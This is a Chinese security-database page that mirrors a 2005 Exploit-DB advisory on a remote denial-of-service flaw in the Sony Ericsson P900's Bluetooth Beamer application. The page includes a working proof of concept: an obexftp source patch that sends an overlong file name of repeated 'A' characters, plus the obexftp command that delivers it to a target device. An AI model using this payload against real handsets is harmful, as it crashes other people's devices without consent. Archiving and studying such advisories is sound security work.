Sony Ericsson P900 Beamer – Malformed File Name Handling Denial of Service

Sony Ericsson P900 Beamer – Malformed File Name Handling Denial of Service

漏洞ID 1055131 漏洞类型
发布时间 2005-05-26 更新时间 2005-05-26
图片[1]-Sony Ericsson P900 Beamer – Malformed File Name Handling Denial of Service-安全小百科CVE编号 N/A
图片[2]-Sony Ericsson P900 Beamer – Malformed File Name Handling Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25711
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/13782/info

Sony Ericsson P900 handset is affected by a remote denial of service vulnerability. This issue arises because the application fails to perform boundary checks prior to copying user-supplied data into a finite sized buffer.

The vulnerability presents itself in the Bluetooth-related Beamer application when handling a malformed file.

Sony Ericsson P900 handset is reportedly affected, however, other handsets such as Sony Ericsson P800 may be vulnerable as well. 

Create a malformed name using 'remotename' in 'obexftp_put_file' function of obexftp client.c:

---- snip ---
object = build_object_from_file (cli->obexhandle,localname, 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
---- snip ---

Chose any existing file and send it using obexftp:
# ./obexftp -b 00:0A:D9:E7:0B:1D --channel 2 -p /etc/passwd -v

相关推荐: Elm Alternative-Folder Buffer Overflow Vulnerability

Elm Alternative-Folder Buffer Overflow Vulnerability 漏洞ID 1103410 漏洞类型 Boundary Condition Error 发布时间 2001-02-13 更新时间 2001-02-13 CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享